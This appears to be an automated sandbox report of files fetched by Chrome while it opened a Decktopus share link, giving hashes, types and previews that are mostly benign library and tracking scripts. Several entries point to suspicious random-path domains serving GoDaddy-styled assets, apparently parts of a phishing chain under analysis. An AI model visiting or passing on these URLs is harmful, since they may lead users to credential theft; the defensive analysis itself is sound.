                                                                                                                              Preview:<HTML><HEAD> <TITLE>200 OK</TITLE></HEAD><BODY>.OK.</BODY></HTML>
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):89501
                                                                                                                              Entropy (8bit):5.289893677458563
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):179
                                                                                                                              Entropy (8bit):5.43356852157574
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:1530C6DC12F768378BD4E6AC4A16EA7B
                                                                                                                              SHA1:7907582C5E23C16D3660A1C35021AD2969855525
                                                                                                                              SHA-256:664EE843EB320E6CFFCEDFD269D76F2E1AC12DE40A1049F70FEB0223C5D710B7
                                                                                                                              SHA-512:A0287C28692862A7430109D6A04DB02153C07176B4A28C7186CA5690936F88074FE71EE42EFAE2549AA77C20BD750F622876697D45DEFF659E377C0659438BA7
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:{"message":"Route GET:/4866422402364353422670923APxZsNZGJZJPJGBETNNWWRJJKSTVMHWRLVPWCTGGVZZJZMIXRXBURTENArsX977tVZRcV34JHw4wTpwx39 not found","error":"Not Found","statusCode":404}
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):186
                                                                                                                              Entropy (8bit):4.712496643099425
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:B6BA82C37C780E791616F8F4D5CA5772
                                                                                                                              SHA1:EFA54D817926FA08DEAA77DB53DBD93521D97B39
                                                                                                                              SHA-256:7B23628656640102C1C313D5CC07B5C4747AEBE0C14B8AA0F2B0773E5B0FD197
                                                                                                                              SHA-512:0F91EBBA603879CCFE270DB25ADD89134FE8D36205F05683DF6272EA82FE017FF582D3F26D46F50F5483C2AF46E2686B66FEFD7944B583D93E99C56577EE67AF
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:{"config": {"enable_collect_everything": true}, "toolbarParams": {}, "isAuthenticated": false, "supportedCompression": ["gzip", "gzip-js"], "featureFlags": [], "sessionRecording": false}
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):28000
                                                                                                                              Entropy (8bit):7.99335735457429
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:
                                                                                                                              MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                                                                              SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                                                                              SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                                                                              SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/rsr9prYkV0yzyluv40
                                                                                                                              Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2252), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):2252
                                                                                                                              Entropy (8bit):5.783452824385759
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:04C8E40D21277872677DAACD118287CB
                                                                                                                              SHA1:C9B1F1AF3A4AB2E9A3D5455D26B5FFD5E364F67F
                                                                                                                              SHA-256:6343FBBB8DC442F2705C02680DB4B4D71EB8722D770FB02EBC6742CEB6DD6FC3
                                                                                                                              SHA-512:882AFE1F0BA2C737754AE18DB878E153F0A2DF7AE873149CE4B334C36C5EDB0ED726C1038716AB8FD7A71139A49FF14932865A89FB29CC8F2C2F889B66C68826
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://td.doubleclick.net/td/rul/10970373263?random=1722285386633&cv=11&fst=1722285386633&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be47o0v893181767z8830215601za201zb830215601&gcd=13l3l3l3l1&dma=0&tag_exp=95250752&u_w=1280&u_h=1024&url=https%3A%2F%2Fapp.decktopus.com%2Fshare%2FLFzs8Q%2F1&hn=www.googleadservices.com&frm=0&tiba=Decktopus%20%7C%20Create%20Better%20Presentations%20%7C%20AI%20Presentation%20Assistant&npa=0&pscdl=noapi&auid=798213833.1722285385&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1
                                                                                                                              Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":2592000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s798213833.1722285385","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s798213833.1722285385","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1s0Ct2bA!2sZs-KTA!3sAAptDV6mmBkN"],"userBiddingSignals":[["7348647275","7336096761"],null,1722285388399246],"ads":[{"renderUrl":"https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=161030276560\u0026cr_id=697956524058\u0026cv_id=0\u0026format=${AD_WIDTH}x${AD_HEIGHT}\u0026r
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):69
                                                                                                                              Entropy (8bit):4.215030923737321
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:1E07B1F0561718948A8C5D4E27BF35FE
                                                                                                                              SHA1:BE52BE187FD676107EE0109A67FB5E71F3CB8865
                                                                                                                              SHA-256:86445D043D040DD3C7DE24A05603172D85196DD7991F0F5EB7104C7CA1FB6710
                                                                                                                              SHA-512:D0FA84AF9A4E68F8B8E5B6EBCFA1E1B9FC8D500611F1E7B595B13D705A27C7B2CA5F2E4D20ACD797E00F63975267DEBB75890830DDC1FD45E37F5F0AABCFFB50
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:failed to parse request: EOF while parsing a value at line 1 column 0
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (1476), with CRLF line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):38284
                                                                                                                              Entropy (8bit):5.112021368539161
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:EA3C880120D132DD7E69D07025F11CF3
                                                                                                                              SHA1:466C053FBCC498C1B6D5D57704E579C017EB34B4
                                                                                                                              SHA-256:B8FE053E02EE76DF190025778161DDCDF3C7DD888A1432C020842C1F08D77646
                                                                                                                              SHA-512:F44047DA2C8FD10F7408B1C95EFA8051FC7C3C8FBEBE1AE4AE0E2BF44F720EF7AFCEC6468809894AC8D542D28AD842651B17E277D0EB343776B0D8DBBD6C5C30
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/abKaq1TrVYPTrFrszmcd30
                                                                                                                              Preview:@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/testweb/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/testweb/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/testweb/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight:
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (10017)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):10245
                                                                                                                              Entropy (8bit):5.437589264532084
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                                                                              SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                                                                              SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                                                                              SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240729%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240729T203652Z&X-Amz-Expires=300&X-Amz-Signature=5c27353349be94ef5f6018f1fc89c922aa4ee21dbb103db3c3fc5e632411554a&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                                                                              Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (18563)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):18631
                                                                                                                              Entropy (8bit):5.206889006086796
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:0D096F780E22293EBA45918935125C33
                                                                                                                              SHA1:9885B95BB7925C415F370C0BF5E3DE8B1238EE0A
                                                                                                                              SHA-256:9B0957706E350DFA896C9A65941BCF11031630B5426761C169E0315B8571ED27
                                                                                                                              SHA-512:2F48E221059771437778406465AEE08F7EBE6B0F33C4C596FB12C321A4709CF0ED08C96D7D3D0231F55310E33E8D8D4D40775CA2D61FDD1FF4CE889FD3DCD183
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://affiliate.decktopus.com/rw.js
                                                                                                                              Preview:/*! Build ee60d0dd646b927e12884fa1d366841d54758bfb:1721909482904 */.!function(e){var t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return r.d(t,"a",t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="https://cdn.getrewardful.com/pa
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (4179)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):269484
                                                                                                                              Entropy (8bit):5.543300418759178
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:73692F41A233BCAEB5E96A3C35E2917F
                                                                                                                              SHA1:F0C50597184CCCB339FFE2354DF7CA2DAB494032
                                                                                                                              SHA-256:F4F08AF3181BDC689D1F524FDFD2089D51930E3F3A307004D676BACC73BDF33E
                                                                                                                              SHA-512:06C76484ACA616230A2475B922EACBE99EBDD971BA0B22CD6A95B88B020DE9F405CA3556ABE0D509100ECD757B926E34EB41F6F18E60DD0F668FF528C39413A0
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://www.googletagmanager.com/gtag/destination?id=AW-10970373263&l=dataLayer&cx=c
                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-10970373263","tag_id":10},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_autoEmailEnabled":true,"vtp_autoPhoneEnabled":false,"vtp_autoAddressEnabled":false,"vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":4},{"function":"__ccd_ads_first","priority":5,"vtp_instanceDestinationId":"AW-10970373263","tag_id":11},{"function":"__ccd_pre_auto_pii","priority":3,"vtp_instanceDestinationId":"AW-10970373263","tag_id":9},{"function":"__ccd_em_form","priority":2,"vtp_includeParams":false,"vtp_instanceDestinationId":"AW-10970373263","tag_id":8},{"function":"__ccd_add_1p_data","priority":1,"vtp_acceptAutomatic":true,"vtp_acceptCode":true,"vtp_accep
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):306
                                                                                                                              Entropy (8bit):4.648623844105592
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:82237324D78F728FBF142D3762CBE6D9
                                                                                                                              SHA1:BCBE63AB8153323EF2675001FC90501ADB8F50E4
                                                                                                                              SHA-256:1F84E4F9371636AA551C5E1AE6292392B03C454848346B3C0BB753555279718D
                                                                                                                              SHA-512:875E038B01C92919984ED9B7800E29DE09FFF2A2DB96CC0896FD581B4D227D2302B3A5388A6FB283999549352E3B8E3E67AE03AF6335FFB8BB1EE34FCF8D5FF9
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://app.decktopus.com/manifest.json
                                                                                                                              Preview:{. "background_color": "#ffffff",. "display": "standalone",. "icons": [. {. "src": "favicon.ico",. "sizes": "64x64 32x32 24x24 16x16",. "type": "image/x-icon". }. ],. "name": "Create React App Sample",. "short_name": "React App",. "start_url": ".",. "theme_color": "#000000".}.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (2343)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):52916
                                                                                                                              Entropy (8bit):5.51283890397623
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                              SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                              SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                              SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://www.google-analytics.com/analytics.js
                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1316), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):1316
                                                                                                                              Entropy (8bit):4.9433703801316815
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:21C01363157A455592A91474F927D03A
                                                                                                                              SHA1:F5F09C1AC6B636B3C11C9900F4BB3566B8F82061
                                                                                                                              SHA-256:A2CE10D30CEFF91469826A1D5B550E2CFF2D9E2875272F8D6E65C5E7407E1774
                                                                                                                              SHA-512:AE66F285E52810AC099A22BC10386A9A446E62394296C6B66D24ADD2D3BE565882186A00932B318AF4FE895DA4A4B6FF603AC3574EFCC879FD9FE23E8E065E01
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://app.decktopus.com/share/LFzs8Q
                                                                                                                              Preview:<!doctype html><html lang="en"><head><base href="/"/><meta charset="utf-8"/><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="icon" href="/favicon.ico" type="image/x-icon"/><link rel="apple-touch-icon" sizes="180x180" href="/favicon/apple-touch-icon.png"/><link rel="mask-icon" href="/favicon/safari-pinned-tab.svg" color="#304ffe"/><link rel="icon" type="image/png" sizes="32x32" href="/favicon/favicon-32x32.png"/><link rel="icon" type="image/png" sizes="16x16" href="/favicon/favicon-16x16.png"/><meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,maximum-scale=1"/><meta name="msapplication-TileColor" content="#ffffff"/><meta name="theme-color" content="#ffffff"/><meta name="robots" content="noindex"/><meta name="description" content="Create Better Presentations | AI Presentation Assistant"/><link rel="manifest" href="/manifest.json"/><title>Decktopus | Create Better Presentations | AI Presentation Assistant</title><script id=
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 256 x 256, 8-bit colormap, non-interlaced
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):5956
                                                                                                                              Entropy (8bit):7.863855442996852
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:6917FF7D1EA04629D0621140C035C474
                                                                                                                              SHA1:CFFA3D0C85E664596ABA0B4977FC4A77B1E2592E
                                                                                                                              SHA-256:32B5E0A703D8261A550D8AF57C32D085470B4B698CA17485963EF7526148D85A
                                                                                                                              SHA-512:AB1A2253FBCBCD9FA625484C7CDD73F81FC45A84116E514BBA11213391A7EE32264B1656F4F911B0BE150DAD1DA7B3CD8EFB8A210FB58F08F74B9995C8469A08
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://cfv21.decktopus.com/users/2641051/80d819a0-368d-4c88-b083-b61e1ed5568b.png?Expires=1722371784&Key-Pair-Id=K295BWQCL741S6&Signature=wFT1acZbjasVw5cFHnTB-X5qan9HZ4C5hdMP-RY0Fck1zYhkbFHUjflMSX6y2f7qHMFQoX1FcYQ1dc~G3nDFd5A9rCEVWbjjgrBpUXJ51oiiSPESSNMMoa2gM6xWO~OiZ3h69fQZjv6poBCSS8EDP3a1ThLaBOE2Ske1eUJDJBrksdQwT3M0MPeXH4W7NpOOUFlRs5T2IWQoSPJbh9FneFsR7pW6gs7zIdV5dbap45A6OQaI4VYWGiwrcrsB-NPybf4t62WkNxas3wlbNO7K3foCBuZbXj-3DEOK9Yut9jF2uBTXsmlRHnG4-SB4ftlpVN45kzrn~Pr3OyN643w5rw__
                                                                                                                              Preview:.PNG........IHDR.............k.XT...FPLTEGpL..........................-.............................................}}}.......,,.yy....]]....kk.""...dd.(9..........22z{|...rr..................BB....R`.ET..........6F....::....PP.JJppq.p{....`m.......wxvwx.~~.qr.......jl```.kk.}.@@@.>>}...ZZ......000....TT...c..K....ny....%% ..ln.~~..{{.>>.T..iln....>>.^^s...cctuv..MPQ..>>...k...11...tt.FF....ss....no..............gjl.......................ik....TT..............NNN......>......NN788.^^.JJ.......&'(...RTU.......wxx........}.....VV....45.==.................................DSZ.~.....tRNS.@..f....IDATx..\.....G.ldY..:8....1...w...e...2<..jx..1..........^.<&.L2...L........c.]I.q..F...+k...~>..,.^...h.3{w-..v.....qWTh..1f/4hk./...$..........._.eHf.o.H..q.b...kT ........[3....p..y_..P.W...!.U+..$.......s...l...{...<...0`.[VW.....U.V....m.@=.|du.>.v&Pv...Ex[....|.a..F.q|........ cd...!.Z.....-.J.~.]:,..^.0..)4N..[.................
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://yeqni.jaishict.ru/47184540469332820691azVhjPuLHQFYGBJPGWOMLPBKKNIQPBWGGRCBGBQLJ
                                                                                                                              Preview:0
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):110109
                                                                                                                              Entropy (8bit):5.431797108301015
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:F42D2D2E3D0A2CE4965612031E2FEB54
                                                                                                                              SHA1:4EC01619725823D3194D860D2461745ED905B7A2
                                                                                                                              SHA-256:19670845F25AD3403D2A2AC74158A4A042FB3018E4ADE53EADE3245744281B2F
                                                                                                                              SHA-512:C8B6E8256AEDF638B9717E59273BA031A2631CD1EE154EFC7E45ADB1FB124BB0F5B1693F0E2DAA0EA173B8308A2231B8297AFE55DD7065CA5155801A6E228EC1
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://us-assets.i.posthog.com/static/recorder.js?v=1.125.0
                                                                                                                              Preview:!function(e){"use strict";function t(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function n(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?t(Object(r),!0).forEach((function(t){l(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):t(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}function r(){r=function(){return e};var e={},t=Object.prototype,n=t.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},a=o.iterator||"@@iterator",i=o.asyncIterator||"@@asyncIterator",s=o.toStringTag||"@@toStringTag";function u(e,t,n){return Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}),e[t]}try{u({},"")}catch(e){u=function(e,t,n){return e[t]=n}}function c(e,t,n,
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):61
                                                                                                                              Entropy (8bit):3.990210155325004
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
